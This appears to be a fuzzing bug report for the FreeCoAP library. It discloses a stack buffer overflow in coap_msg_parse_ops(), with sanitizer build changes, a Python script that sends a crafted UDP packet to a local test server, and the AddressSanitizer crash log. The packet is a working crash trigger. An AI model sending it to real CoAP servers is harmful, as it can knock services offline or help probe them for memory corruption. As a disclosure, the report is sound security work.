Bug: Stack-buffer-overflow on coap_msg_parse_ops() in coap_msg.c

[fizz-is-on-the-way]

#Reproduce Info

Build

Build Environment Update

The Makefile within the test_coap_server directory has been updated to utilize clang with sanitizers.

 I1 = ../../lib/include
 S1 = ../../lib/src
-CC_ ?= gcc
-CFLAGS = -Wall \
+CC_ ?= clang
+CFLAGS = -Wall -g -fsanitize=address,undefined -fno-omit-frame-pointer\
          -I $(I1)
 CFLAGS += $(IP6_CFLAGS)
 CFLAGS += $(DTLS_CFLAGS)
-LD_ ?= gcc
-LDFLAGS =
+LD_ ?= clang
+LDFLAGS = -fsanitize=address,undefined
 INCS = $(I1)/coap_server.h \
        $(I1)/coap_msg.h \
        $(I1)/coap_mem.h \

Building test_coap_server

cd FreeCoAP/test/test_coap_server
make dtls=n

Attack

Starting the CoAP Server

The CoAP server was started using the test_coap_server executable:

cd FreeCoAP/test/test_coap_server
./test_coap_server 12436

Sending the Packet

import socket

def send_hexstream_to_server(hexstream, server_ip, server_port):
    # Convert hexstream to bytes
    data = bytes.fromhex(hexstream)
    
    # Create a UDP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    
    try:
        # Send data to the server
        sock.sendto(data, (server_ip, server_port))
        print(f"Sent hexstream to {server_ip}:{server_port}")
    except Exception as e:
        print(f"Failed to send hexstream: {e}")
    finally:
        sock.close()

# Define the server IP and port
server_ip = "127.0.0.1"
server_port = 12436

# Define the hexstreams
hexstreams = [ "4401c1ba7d7447a7b7726567756c61722d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d3839363637", "35612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d2d383936363734612d2d383936363735612d2d3138343436373434303733373039353531363137612d2d383936363735612d2d383936363735612d2d31612d2d383936363735612d2d383936363735612d2d38393636373561"
]

for hexstream in hexstreams:
    send_hexstream_to_server(hexstream, server_ip, server_port)

Description

AddressSanitizer has detected a stack buffer overflow issue within the coap_msg_parse_ops function, specifically at line 643 in coap_msg.c.

Here is the ASan report:

=================================================================
==29287==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8435c640 at pc 0x4d136e bp 0x7ffc8435b7d0 sp 0x7ffc8435b7c8
READ of size 1 at 0x7ffc8435c640 thread T0
    #0 0x4d136d in coap_msg_parse_ops /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:643
    #1 0x4ce19a in coap_msg_parse /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:744
    #2 0x4b1668 in coap_server_trans_recv /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:1089
    #3 0x4a670e in coap_server_exchange /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:2285
    #4 0x4a2368 in coap_server_run /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:2559
    #5 0x47d938 in main /home/fuzz/target_program/FreeCoAP/test/test_coap_server/test_coap_server.c:683
    #6 0x7f66c5305554 in __libc_start_main (/lib64/libc.so.6+0x22554)
    #7 0x47cffc in _start (/home/fuzz/target_program/FreeCoAP/test/test_coap_server/test_coap_server+0x47cffc)

Address 0x7ffc8435c640 is located in stack of thread T0 at offset 1696 in frame
    #0 0x4b04bf in coap_server_trans_recv /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:1027

  This frame has 9 object(s):
    [32, 40) ''
    [96, 104) ''
    [160, 168) ''
    [224, 240) 'client_sin'
    [288, 296) 'server'
    [352, 356) 'client_sin_len'
    [416, 424) 'num'
    [480, 488) 'ret'
    [544, 1696) 'buf' <== Memory access at offset 1696 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:643 coap_msg_parse_ops
Shadow bytes around the buggy address:
  0x100010863870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100010863880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100010863890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000108638a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000108638b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000108638c0: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 00 00
  0x1000108638d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000108638e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000108638f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100010863900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100010863910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==29287==ABORTING

[fizz-is-on-the-way]

In master branch latest version